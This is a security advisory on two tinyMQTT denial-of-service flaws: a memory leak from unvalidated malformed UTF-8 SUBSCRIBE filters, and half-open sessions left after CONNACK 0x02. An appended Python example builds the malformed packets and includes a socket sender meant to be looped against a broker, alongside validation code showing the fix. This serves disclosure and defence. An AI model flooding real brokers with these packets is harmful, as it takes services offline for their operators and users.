tinyMQTT Memory Leak and Resource Exhaustion Vulnerabilities
Vulnerability
A memory leak has been identified in tinyMQTT at commit 6226ade (February 18, 2024). The broker does not validate that the topic filters in SUBSCRIBE packets are well-formed UTF-8, so a client can send subscription requests whose filters are malformed or oversized. Memory is allocated for every such filter and never released, so a sustained stream of malformed SUBSCRIBE packets grows the broker's memory without bound until it is exhausted. MQTT 3.1.1 instead requires the broker to close the network connection when it receives a control packet containing malformed UTF-8. A second flaw concerns session handling: when a CONNECT packet carries a zero-length ClientId with CleanSession=0, the broker sends a CONNACK with return code 0x02 (Connection Refused, identifier rejected), as the specification requires, but then fails to close the network connection. An attacker can therefore open a large number of half-open sessions, exhausting server resources until the broker becomes unresponsive or crashes.
Impact
Exploitation of these vulnerabilities leads to a memory leak and resource exhaustion, causing the MQTT broker to become unresponsive or crash.
Reproduction
To reproduce the memory leak, send repeated SUBSCRIBE packets whose topic filters contain malformed UTF-8; the broker accepts them without validation and allocates memory for each filter that is never freed, so its resident memory grows with every packet. To reproduce the resource exhaustion, send CONNECT packets with a zero-length ClientId and CleanSession=0; the broker returns CONNACK 0x02 but does not close the connection, so each such CONNECT leaves a socket and its session state open on the server. Opening many of these in parallel consumes server resources until the broker stops responding. A conforming broker closes the connection in both cases, so the check for a fix is that the server tears down the TCP connection after a malformed SUBSCRIBE and immediately after the CONNACK 0x02.
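The two packet shapes from the reproduction steps above, together with the checks an MQTT 3.1.1 broker must apply to them, as an added Python example that is not part of this advisory and not tinyMQTT's code. It assumes MQTT 3.1.1 (protocol level 4) framing; the `sensors/...` filter, the `\xff\xfe` bytes and any host or port you pass to `send_packets` are constructed illustrations, and the sender must only be pointed at a broker you are authorised to test.

```python
import socket
import struct

CONNACK_ACCEPTED = 0x00
CONNACK_IDENTIFIER_REJECTED = 0x02  # "Connection Refused, identifier rejected"

def mqtt_string(data: bytes) -> bytes:
    # 2-byte big-endian length prefix, then the raw bytes.
    return struct.pack(">H", len(data)) + data

def encode_remaining_length(n: int) -> bytes:
    # MQTT variable-length "Remaining Length" field, 1 to 4 bytes.
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)

def decode_remaining_length(buf: bytes, pos: int):
    # Inverse of encode_remaining_length; returns (value, next_pos).
    multiplier, value = 1, 0
    while True:
        b = buf[pos]
        pos += 1
        value += (b & 0x7F) * multiplier
        if not b & 0x80:
            return value, pos
        multiplier *= 128
        if multiplier > 128 ** 3:
            raise ValueError("malformed Remaining Length")

def build_connect(client_id: bytes, clean_session: bool, keepalive: int = 60) -> bytes:
    # MQTT 3.1.1 CONNECT; client_id=b"" with clean_session=False is the half-open case.
    flags = 0x02 if clean_session else 0x00
    body = mqtt_string(b"MQTT") + bytes([0x04, flags]) + struct.pack(">H", keepalive)
    body += mqtt_string(client_id)
    return bytes([0x10]) + encode_remaining_length(len(body)) + body

def build_subscribe(packet_id: int, topic_filter: bytes, qos: int = 0) -> bytes:
    # MQTT 3.1.1 SUBSCRIBE with one filter given as raw bytes, so malformed
    # UTF-8 can be sent deliberately.
    body = struct.pack(">H", packet_id) + mqtt_string(topic_filter) + bytes([qos])
    return bytes([0x82]) + encode_remaining_length(len(body)) + body

# --- Broker-side checks: added reference logic, not tinyMQTT's own code ---

def valid_mqtt_utf8(data: bytes) -> bool:
    # MQTT 3.1.1 s.1.5.3: well-formed UTF-8 (Python's strict decoder rejects
    # overlong forms and UTF-16 surrogates) and no U+0000 anywhere.
    try:
        return "\x00" not in data.decode("utf-8")
    except UnicodeDecodeError:
        return False

def check_connect(client_id: bytes, clean_session: bool):
    # MQTT 3.1.1 s.3.1.3.3: empty ClientId with CleanSession=0 must get
    # CONNACK 0x02 and the broker must then close the network connection.
    if not client_id and not clean_session:
        return CONNACK_IDENTIFIER_REJECTED, True
    return CONNACK_ACCEPTED, False

def parse_subscribe(packet: bytes):
    # Bounds-checked parse of SUBSCRIBE into [(filter_bytes, qos), ...].
    if packet[0] != 0x82:
        raise ValueError("not a SUBSCRIBE packet")
    remaining, pos = decode_remaining_length(packet, 1)
    end = pos + remaining
    if end != len(packet):
        raise ValueError("Remaining Length does not match packet size")
    pos += 2  # packet identifier
    filters = []
    while pos < end:
        (length,) = struct.unpack_from(">H", packet, pos)
        pos += 2
        if pos + length + 1 > end:
            raise ValueError("topic filter runs past the packet")
        filters.append((packet[pos:pos + length], packet[pos + length]))
        pos += length + 1
    if not filters:
        raise ValueError("SUBSCRIBE carries no topic filter")
    return filters

def subscribe_accepted(packet: bytes) -> bool:
    # Accept only if every filter is valid MQTT UTF-8; otherwise the broker must
    # close the connection instead of allocating a subscription entry.
    try:
        return all(valid_mqtt_utf8(f) for f, _ in parse_subscribe(packet))
    except (ValueError, IndexError, struct.error):
        return False

def send_packets(host: str, port: int, packets, timeout: float = 2.0) -> bytes:
    # Send raw packets to a broker you are authorised to test; return its reply.
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for pkt in packets:
            sock.sendall(pkt)
        try:
            return sock.recv(64)
        except socket.timeout:
            return b""

if __name__ == "__main__":
    # Constructed packets matching the advisory's two reproduction steps.
    half_open = build_connect(b"", clean_session=False)
    bad_sub = build_subscribe(1, b"sensors/\xff\xfe/temp")  # \xff\xfe is invalid UTF-8
    print("CONNECT:  ", half_open.hex())
    print("SUBSCRIBE:", bad_sub.hex())
    print("conforming broker accepts SUBSCRIBE:", subscribe_accepted(bad_sub))
```

Run as a script to see the raw packet bytes; to exercise a test broker, call `send_packets(host, port, [build_connect(b"", False)])` in a loop and watch whether the server side closes each connection after the CONNACK, or `send_packets(host, port, [build_connect(b"c1", True), bad_sub])` repeatedly while watching the broker's resident memory. The broker-side functions show the two decisions a fixed broker has to make: `check_connect` returns `must_close=True` for the empty-ClientId case, and `subscribe_accepted` refuses any packet whose filter fails `valid_mqtt_utf8`, before anything is allocated for it.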